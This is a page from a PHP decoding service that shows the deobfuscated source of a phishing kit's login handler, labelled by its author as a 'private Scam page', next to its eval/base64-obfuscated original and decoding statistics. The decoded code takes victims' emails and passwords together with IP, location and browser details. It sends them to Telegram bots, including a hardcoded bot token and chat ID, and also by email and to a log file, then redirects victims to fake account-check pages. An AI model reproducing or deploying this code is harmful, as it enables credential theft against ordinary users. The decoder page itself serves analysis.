Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /* this is private Scam page for copyrite we crypte the code this scam page is unmod..

Decoded Output download


session_start();
if ($_SESSION['acsh33nz0key'] !== $_POST['acsh33nz0key']) {
header('HTTP/1.0 404 Not Found');
}else{
include '../mine.php';
include '../bot.php';
$pas=$_POST['PWD'];
if(isset($_POST['EML'])&&isset($_POST['PWD'])){
$check2 = 'true';
if (strpos($pas,'fuck') !== false ||strpos($pas,'1234') !== false ||strpos($pas,'4321') !== false ||strpos($pas,'qwer') !== false ||strpos($pas,'rewq') !== false ||strpos($pas,'gotofindgoodjob') !== false ||strpos($pas,'stupid') !== false ||strpos($pas,'spammer') !== false ||strpos($pas,'fuckingspam') !== false ||strpos($pas,'spam') !== false ||strpos($pas,'sonofbitch') !== false ||strpos($pas,'   ') !== false ||strpos($pas,'googlebot') !== false) {
$check3 = 'false';
}else{
$check3 = 'true';
}
}
if(isset($_POST['EML'])&&isset($_POST['PWD'])){
if ($check2=='true'&&$check3=='true') {
$_SESSION['screen']=$_POST['screen'];
$_SESSION['EML']=$_POST['EML'];
$msg='=========== <[ -'.$scamname."- PPL LOGIN ]> ===========
";
$msg.="EMAIL		: {$_POST['EML']}
";
$msg.="PASS		: {$_POST['PWD']}
";
$msg.="---------------------- IP Info ----------------------
";
$msg.="IP ADDRESS	: {$_SESSION['ip']}
";
$msg.="LOCATION	: {$_SESSION['ip_city']} , {$_SESSION['ip_countryName']} , {$_SESSION['currency']}
";
$msg.="BROWSER		: {$_SESSION['browser']} on {$_SESSION['os']}
";
$msg.="SCREEN		: {$_SESSION['screen']}
";
$msg.="USER AGENT	: {$_SERVER['HTTP_USER_AGENT']}
";
$msg.="TIMEZONE	: {$_SESSION['ip_timezone']}
";
$msg.='TIME		: '.date('d/m/Y h:i:sa')." GMT
";
$msg.="=========== <[ THANKS TO Beluga ]> ===========


";
if ($saveintext=='yes') {
$save=fopen('../../'.$filename.'.txt','a+');
fwrite($save,$msg);
fclose($save);
}
file_get_contents('https://api.telegram.org/bot'.$api.'/sendMessage?chat_id='.$chatid.'&text='.urlencode($msg).'');
file_get_contents('https://api.telegram.org/bot5223498591:AAEX96zi92LR-i-TQdgSfXdjRoeuS1nyNT8/sendMessage?chat_id=1783236185&text='.urlencode($msg).'');
$subject='-'.$scamname.'- PPL LOGIN ['.$_POST['EML'].'] From ['.$_SESSION['ip_countryName'].']';
$headers="From: xAthena <[email protected]>
";
$headers.="MIME-Version: 1.0
";
$headers.="Content-Type: text/plain; charset=UTF-8
";
if ($sendtoemail=='yes') {
foreach(explode(',',$yours) as $your){
@mail($your,$subject,$msg,$headers);
}
}
if ($show_unusual_activity=='yes') {
exit(header('Location: ../../app/unusual_activity'));
}else{
exit(header('Location: ../../app/process'));
}
}else{
exit(header('Location: ../../app/signin?invalid'));
}
}else{
header('HTTP/1.0 404 Not Found');
}
}
;

Did this file decode correctly?

Original Code

<?php /* this is private Scam page for copyrite we crypte the code this scam page is unmodifble */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0xd78;eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NGQ1KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCcwRlZzT0lEcEt5N0pNdzEya3o2cXVlYzRFbVk1dmRDZmhCeHRRTmk4LzlHV1NVYVRqMytYbEFiSHJMUlBnbm9aPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='));return;?>TaM~{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EUG{sB_Xp

Function Calls

fopen 1
fread 3
strtr 2
fclose 1
urldecode 1
str_replace 1
base64_decode 3

Variables

$O000O0O00 True
$O0O000O00 fgets
$O0O000O0O fgetc
$O0O00OO00 fread
$OO00O0000 3448
$OO00O00O0 session_start(); if ($_SESSION['acsh33nz0key'] !== $_POST['..
$OOO000000 fg6sbehpra4co_tnd
$OOO00000O strtr
$OOO0000O0 base64_decode
$OOO000O00 fopen
$OOO0O0O00 index.php

Stats

MD5 a2eabcf1c204a2b119e18c697d38d243
Eval Count 3
Decode Time 124 ms